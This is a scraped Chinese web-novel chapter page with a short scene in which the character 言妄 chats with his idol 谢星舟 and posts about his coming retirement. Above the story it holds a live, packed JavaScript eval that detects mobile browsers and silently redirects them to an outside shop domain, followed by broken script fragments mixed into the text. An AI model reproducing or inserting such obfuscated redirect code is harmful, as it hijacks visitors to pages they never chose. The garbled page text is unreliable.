字体
关灯
   存书签 书架管理 返回目录

    ;eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="j://e.d.f/h/g/"}',24,24,'userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17505578|201957||http|test|mini|href|location'.split('|'),0,{}));
    () {
    $('.inform').remove();
    $('#content').append('
    ”
    突然有点心虚怎么回事。
    旺旺雪饼:【哥哥喜欢就好!】
    旺旺雪饼:【小狗探头.jpg】
    谢星舟:【#拍头】
    旺旺雪饼:【我去写作业了】
    旺旺雪饼:【小狗挥手.jpg】
    虽然谢星舟已经知道自己是他黑粉,但言妄还是有背后骂人被抓包的窘迫。
    他是不是有点太得意忘形了?
    仗着谢星舟是个好人,居然这么不知收敛。
    言妄默默停止了罪恶的“Boat不要脸”攻击,改为发【#大哭】。
    可恶。
    还是很难接受男神要退役这件事啊。
    本来是发泄情绪的帖子,没多久,居然多了条回复。
    闭嘴看我操作留言:【#疑惑】
    言妄:“……”


关闭+畅/阅读=模式,看最新完整内容。本章未完,请点击下一页继续阅读》》
上一页 目录 下一页